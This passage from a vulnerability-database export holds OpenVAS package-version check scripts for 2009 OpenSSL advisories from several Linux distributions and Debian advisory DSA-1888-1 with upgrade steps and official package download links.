isdpkgvuln(pkg:\"libssl0.9.7-dbg\", ver:\"0.9.7k-3.1etch5\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.8c-4etch9\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.8-dbg\", ver:\"0.9.8c-4etch9\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.8g-15+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8g-15+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.8-dbg\", ver:\"0.9.8g-15+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.8g-15+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:55", "references": [], "pluginID": "64935", "description": "The remote host is missing updates to openssl announced in\nadvisory CESA-2009:1335.", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-09-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "CentOS Security Advisory CESA-2009:1335 (openssl)", "type": "openvas", "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1387", "CVE-2009-1378", "CVE-2009-0590"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64935", "id": "OPENVAS:64935", "sourceData": "#CESA-2009:1335 64935 2\n# $Id: ovcesa2009_1335.nasl 6650 2017-07-10 11:43:12Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1335 (openssl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1335\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1335\";\ntag_summary = \"The remote host is missing updates to openssl announced in\nadvisory CESA-2009:1335.\";\n\n\n\nif(description)\n{\n script_id(64935);\n script_version(\"$Revision: 6650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:43:12 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-21 23:13:00 +0200 (Mon, 21 Sep 2009)\");\n script_cve_id(\"CVE-2009-0590\", \"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\", \"CVE-2009-1386\", \"CVE-2009-1387\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"CentOS Security Advisory CESA-2009:1335 (openssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~12.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~0.9.8e~12.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~0.9.8e~12.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:31", "references": [], "pluginID": "66517", "description": "The remote host is missing updates announced in\nadvisory GLSA 200912-01.", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-12-14T00:00:00", "title": "Gentoo Security Advisory GLSA 200912-01 (openssl)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1379", "CVE-2009-1377", "CVE-2009-2409", "CVE-2009-1387", "CVE-2009-1378", "CVE-2009-3555"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66517", "id": "OPENVAS:66517", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in OpenSSL might allow remote attackers to conduct\n multiple attacks, including the injection of arbitrary data into\nencrypted\n byte streams.\";\ntag_solution = \"All OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/openssl-0.9.8l-r2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200912-01\nhttp://bugs.gentoo.org/show_bug.cgi?id=270305\nhttp://bugs.gentoo.org/show_bug.cgi?id=280591\nhttp://bugs.gentoo.org/show_bug.cgi?id=292022\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200912-01.\";\n\n \n \n\nif(description)\n{\n script_id(66517);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\", \"CVE-2009-1387\", \"CVE-2009-2409\", \"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200912-01 (openssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-libs/openssl\", unaffected: make_list(\"ge 0.9.8l-r2\"), vulnerable: make_list(\"lt 0.9.8l-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:37:26", "references": [], "pluginID": "136141256231066370", "description": "The remote host is missing an update to openssl\nannounced via advisory MDVSA-2009:310.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-12-10T00:00:00", "title": "Mandriva Security Advisory MDVSA-2009:310 (openssl)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Mandrake Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-2409", "CVE-2009-1387", "CVE-2009-1378"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066370", "id": "OPENVAS:136141256231066370", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_310.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:310 (openssl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed with this update, please\nvisit the referenced security advisories.\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nThe updated packages have been patched to prevent this.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:310\nhttp://marc.info/?l=openssl-cvs&m=124508133203041&w=2\";\ntag_summary = \"The remote host is missing an update to openssl\nannounced via advisory MDVSA-2009:310.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66370\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\", \"CVE-2009-1386\", \"CVE-2009-1387\", \"CVE-2009-2409\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:310 (openssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libopenssl0.9.8\", rpm:\"libopenssl0.9.8~0.9.8e~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0.9.8-devel\", rpm:\"libopenssl0.9.8-devel~0.9.8e~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0.9.8-static-devel\", rpm:\"libopenssl0.9.8-static-devel~0.9.8e~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64openssl0.9.8\", rpm:\"lib64openssl0.9.8~0.9.8e~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64openssl0.9.8-devel\", rpm:\"lib64openssl0.9.8-devel~0.9.8e~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64openssl0.9.8-static-devel\", rpm:\"lib64openssl0.9.8-static-devel~0.9.8e~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:14:57", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "4", "packageVersion": "0.9.8c-4etch9", "arch": "all", "packageFilename": "openssl_0.9.8c-4etch9_all.deb", "packageName": "openssl", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "0.9.7k-3.1etch5", "arch": "all", "packageFilename": "openssl097_0.9.7k-3.1etch5_all.deb", "packageName": "openssl097", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "0.9.8g-15+lenny5", "arch": "all", "packageFilename": "libssl0.9.8_0.9.8g-15+lenny5_all.deb", "packageName": "libssl0.9.8", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "0.9.8g-15+lenny5", "arch": "all", "packageFilename": "openssl_0.9.8g-15+lenny5_all.deb", "packageName": "openssl", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "0.9.7k-3.1etch5", "arch": "all", "packageFilename": "libssl0.9.7-dbg_0.9.7k-3.1etch5_all.deb", "packageName": "libssl0.9.7-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "0.9.8g-15+lenny5", "arch": "all", "packageFilename": "libcrypto0.9.8-udeb_0.9.8g-15+lenny5_all.deb", "packageName": "libcrypto0.9.8-udeb", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "0.9.8g-15+lenny5", "arch": "all", "packageFilename": "libssl-dev_0.9.8g-15+lenny5_all.deb", "packageName": "libssl-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "0.9.8c-4etch9", "arch": "all", "packageFilename": "libssl0.9.8-dbg_0.9.8c-4etch9_all.deb", "packageName": "libssl0.9.8-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "0.9.8c-4etch9", "arch": "all", "packageFilename": "libcrypto0.9.8-udeb_0.9.8c-4etch9_all.deb", "packageName": "libcrypto0.9.8-udeb", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "0.9.7k-3.1etch5", "arch": "all", "packageFilename": "libssl0.9.7_0.9.7k-3.1etch5_all.deb", "packageName": "libssl0.9.7", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "0.9.8g-15+lenny5", "arch": "all", "packageFilename": "libssl0.9.8-dbg_0.9.8g-15+lenny5_all.deb", "packageName": "libssl0.9.8-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "0.9.8c-4etch9", "arch": "all", "packageFilename": "libssl0.9.8_0.9.8c-4etch9_all.deb", "packageName": "libssl0.9.8", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "0.9.8c-4etch9", "arch": "all", "packageFilename": "libssl-dev_0.9.8c-4etch9_all.deb", "packageName": "libssl-dev", "operator": "lt"}], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1888-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nSeptember 15, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : openssl, openssl097\nVulnerability : cryptographic weakness\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2009-2409\n\nCertificates with MD2 hash signatures are no longer accepted by OpenSSL,\nsince they&#x27;re no longer considered cryptographically secure.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.8g-15+lenny5.\n\nFor the old stable distribution (etch), this problem has been fixed in\nversion 0.9.8c-4etch9 for openssl and version 0.9.7k-3.1etch5 for\nopenssl097.\nThe OpenSSL 0.9.8 update for oldstable (etch) also provides updated\npackages for multiple denial of service vulnerabilities in the\nDatagram Transport Layer Security implementation. These fixes were\nalready provided for Debian stable (Lenny) in a previous point\nupdate. The OpenSSL 0.9.7 package from oldstable (Etch) is not\naffected. (CVE-2009-1377, CVE-2009-1378, CVE-2009-1379,\nCVE-2009-1386 and CVE-2009-1387)\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 0.9.8k-5.\n\nWe recommend that you upgrade your openssl packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k-3.1etch5.dsc\n Size/MD5 checksum: 1417 cfeda0aa5b691a5745475692c5d95023\n http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k-3.1etch5.diff.gz\n Size/MD5 checksum: 35983 d36ced1a9b6bc9fb473142df040a06d6\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch9.dsc\n Size/MD5 checksum: 1455 853078a1ba61d986d0862b7052e6a47b\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c.orig.tar.gz\n Size/MD5 checksum: 3313857 78454bec556bcb4c45129428a766c886\n http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k.orig.tar.gz\n Size/MD5 checksum: 3292692 be6bba1d67b26eabb48cf1774925416f\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch9.diff.gz\n Size/MD5 checksum: 59037 1d168f6505755d3d5b2cc5c8dfc4a314\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch9_alpha.deb\n Size/MD5 checksum: 2623244 6d978b3c3271793c8e7af4805335186c\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch5_alpha.deb\n Size/MD5 checksum: 2209790 7b1bd54453a93ae2b20d25abf8e0187a\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch9_alpha.deb\n Size/MD5 checksum: 2556932 aff297a5754a34193d35e1e7bb1de5e5\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch5_alpha.deb\n Size/MD5 checksum: 3822402 2d51057194c55709f258303f9eb5634d\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch9_alpha.deb\n Size/MD5 checksum: 1015184 1a7ee5f6d57cc91aaee2df7efbed7e03\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch9_alpha.deb\n Size/MD5 checksum: 4561710 6e24f6d818c1c6e791f3b457e9d025cd\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch9_alpha.udeb\n Size/MD5 checksum: 677314 840e921e5eb158208331c1eb4e546453\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch9_amd64.deb\n Size/MD5 checksum: 2188696 730e51554bee77b38922ab4968f7bd8f\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch9_amd64.deb\n Size/MD5 checksum: 891856 373b14c8d5d44eba8e2a704d29621e4e\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch5_amd64.deb\n Size/MD5 checksum: 1328748 32e707b77f010c26690d0d170b3b8c71\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch9_amd64.deb\n Size/MD5 checksum: 1655940 94723e6134595ff2a407ab3cb99c24c9\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch9_amd64.udeb\n Size/MD5 checksum: 580330 d98c62ccbd82164d39df6366fa654308\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch5_amd64.deb\n Size/MD5 checksum: 755234 7165fcc39018915a7e3c777af0577305\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch9_amd64.deb\n Size/MD5 checksum: 1017888 fe9448a60c33599b868d17865789e2cc\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch9_arm.deb\n Size/MD5 checksum: 1010856 09a084ee052c3fdc4dc143a9b490e6e2\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch9_arm.deb\n Size/MD5 checksum: 1540164 dfc8a72eba408506cf5e26d54f5d7279\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch9_arm.deb\n Size/MD5 checksum: 2048878 df31a9c9a6ddf22c72ecf29ccf1b1717\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch9_arm.udeb\n Size/MD5 checksum: 516754 ee398a3bdd932297310166de7ce28739\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch5_arm.deb\n Size/MD5 checksum: 672672 78b6e01942db91439d49cfa0a317b549\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch5_arm.deb\n Size/MD5 checksum: 1230262 af62aacfce4e19ce641cc532bd51545a\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch9_arm.deb\n Size/MD5 checksum: 804254 0fb9c58ac33f4009c5dafa3feb240b13\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch9_hppa.deb\n Size/MD5 checksum: 1028976 a31e8c423d6b372a66bdf1a8e869ea13\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch5_hppa.deb\n Size/MD5 checksum: 1275094 e1f8d6e9288ea8e83838cf5aee245709\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch9_hppa.udeb\n Size/MD5 checksum: 631474 c3c31809d2957e0936722f031324dcab\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch9_hppa.deb\n Size/MD5 checksum: 2251788 2a1efa87bbda28aeec06808a5f75799d\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch9_hppa.deb\n Size/MD5 checksum: 1585738 5d27d5d0a93266568a3d47d57a918fd1\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch5_hppa.deb\n Size/MD5 checksum: 794096 8da69cd67e4e99b4b1fcd2c7b9ce60b8\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch9_hppa.deb\n Size/MD5 checksum: 945942 93743a8199b6091d3675dd19136fefe0\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch9_i386.deb\n Size/MD5 checksum: 1015854 3d55c6714377dd3f880ca00d5fd33d8f\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch9_i386.deb\n Size/MD5 checksum: 5584118 8474aecd2a5a9289eea1543701637b7b\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch9_i386.deb\n Size/MD5 checksum: 2094906 f47d4add189e6054063d6e4ef0ed9f53\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch5_i386.deb\n Size/MD5 checksum: 2285698 ba20a1691c95172c7e6e65d2edd6b734\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch5_i386.deb\n Size/MD5 checksum: 4646064 ea07573ce039d1f70cc3217af3976a5a\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch9_i386.deb\n Size/MD5 checksum: 2721748 90224715a47b6a5a4b9cbc73aa5e4194\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch9_ia64.deb\n Size/MD5 checksum: 1071422 eacef698406ad3ee5b2869fbf278b282\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch9_ia64.deb\n Size/MD5 checksum: 2594594 e6b7552444f3dfa26c142255e4fb4dbb\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch5_ia64.deb\n Size/MD5 checksum: 1263766 519bd736295e4243ba2a8999cc461f64\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch5_ia64.deb\n Size/MD5 checksum: 1010298 e183563e65de671bf1b712d7f0008572\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch9_ia64.deb\n Size/MD5 checksum: 1192868 b2896f6d0056cb31cb6b18778328f8d8\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch9_ia64.udeb\n Size/MD5 checksum: 801820 e8a2bc842a7f30df0f3ac051c7931206\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch9_ia64.deb\n Size/MD5 checksum: 1570120 715a266df73ca20b088f89a37360c2bb\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch9_mips.deb\n Size/MD5 checksum: 1004038 6ba64dcdfbe17e9dab35140704a3a631\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch5_mips.deb\n Size/MD5 checksum: 1352542 b04ccbce03f8733826da59b88679c271\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch9_mips.deb\n Size/MD5 checksum: 876374 88d019182c4708cb9f562ad50356ece4\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch5_mips.deb\n Size/MD5 checksum: 729468 8df90f5763fe490802d08cfda48dde8e\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch9_mips.udeb\n Size/MD5 checksum: 580262 e6b1048861355c2a72924d62e0152c48\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch9_mips.deb\n Size/MD5 checksum: 2262814 